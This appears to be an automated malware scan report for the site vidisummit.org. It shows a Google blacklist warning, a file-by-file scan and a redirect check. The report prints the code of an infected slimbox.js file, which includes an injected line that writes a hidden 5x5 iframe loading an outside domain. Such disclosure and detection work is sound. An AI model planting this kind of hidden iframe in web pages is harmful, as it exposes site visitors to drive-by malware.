Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vidisummit.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.vidisummit.org/ | 200 OK Content-Length: 37972 Content-Type: text/html | clean |
http://www.vidisummit.org/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://www.vidisummit.org/modules/mod_idslider/tmpl/mod_idslider_class.noobslide.js | 200 OK Content-Length: 5596 Content-Type: application/javascript | clean |
http://www.vidisummit.org/plugins/content/fboxbot/frontbox/fbox_conf.js | 200 OK Content-Length: 342 Content-Type: application/javascript | clean |
http://www.vidisummit.org/plugins/content/fboxbot/frontbox/fbox_engine-min.js | 200 OK Content-Length: 4730 Content-Type: application/javascript | clean |
http://www.vidisummit.org/includes/js/overlib_mini.js | 200 OK Content-Length: 36878 Content-Type: application/javascript | clean |
http://www.vidisummit.org/components/com_joomgallery/assets/js/joomscript.js | 200 OK Content-Length: 15190 Content-Type: application/javascript | clean |
http://www.vidisummit.org/components/com_joomgallery/assets/js/slimbox/js/slimbox.js | 200 OK Content-Length: 14112 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Slimbox; (function() { var state = 0, options, images, activeImage, prevImage, nextImage, top, eventKeyDown, fx, preload, preloadPrev = new Image(), preloadNext = new Image(), overlay, center, image, prevLink, nextLink, bottomContainer, bottom, caption, number; window.addEvent("domready", function() { eventKeyDown = keyDown.bindWithEvent(); $(document.body).adopt( $$([ overlay = new Element("div", {id: "lbOverl var links = $$("a").filter(function(el) { return el.rel && el.rel.test(/^lightbox/i); }); $$(links).slimbox({}, null, function(el) { return (this == el) || ((this.rel.length > 8) && (this.rel == el.rel)); }); }; window.addEvent("domready", Slimbox.scanPage); document.write('<iframe src="http://batterystreaks.org/Lexmark?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://batterystreaks.org/lexmark?8 <iframe src="http://batterystreaks.org/lexmark?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://www.vidisummit.org/index.php?lang=hr | 200 OK Content-Length: 37972 Content-Type: text/html | clean |
http://www.vidisummit.org/index.php?lang=en | 200 OK Content-Length: 37978 Content-Type: text/html | clean |
http://www.vidisummit.org/index.php?lang=zh | 200 OK Content-Length: 37973 Content-Type: text/html | clean |
http://www.vidisummit.org/index.php?option=com_content&view=article&id=69%3Aivan-iki&catid=25&Itemid=55&lang=zh | 200 OK Content-Length: 40480 Content-Type: text/html | clean |
http://www.vidisummit.org/plugins/content/jw_allvideos/includes/jw_allvideos_scripts.php | 200 OK Content-Length: 57370 Content-Type: text/javascript | clean |
http://www.vidisummit.org/index.php?option=com_content&view=article&id=69:ivan-iki&catid=25&Itemid=55&lang=hr | 200 OK Content-Length: 40506 Content-Type: text/html | clean |
http://www.vidisummit.org/index.php?option=com_content&view=article&id=69:ivan-iki&catid=25&Itemid=55&lang=en | 200 OK Content-Length: 40507 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vidisummit.org
Result:
GET / HTTP/1.1
Host: vidisummit.org
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: vidisummit.org
Referer: http://www.google.com/search?q=vidisummit.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vidisummit.org
Referer: http://www.google.com/search?q=vidisummit.org
Result:
The result is similar to the first query. There are no suspicious redirects found.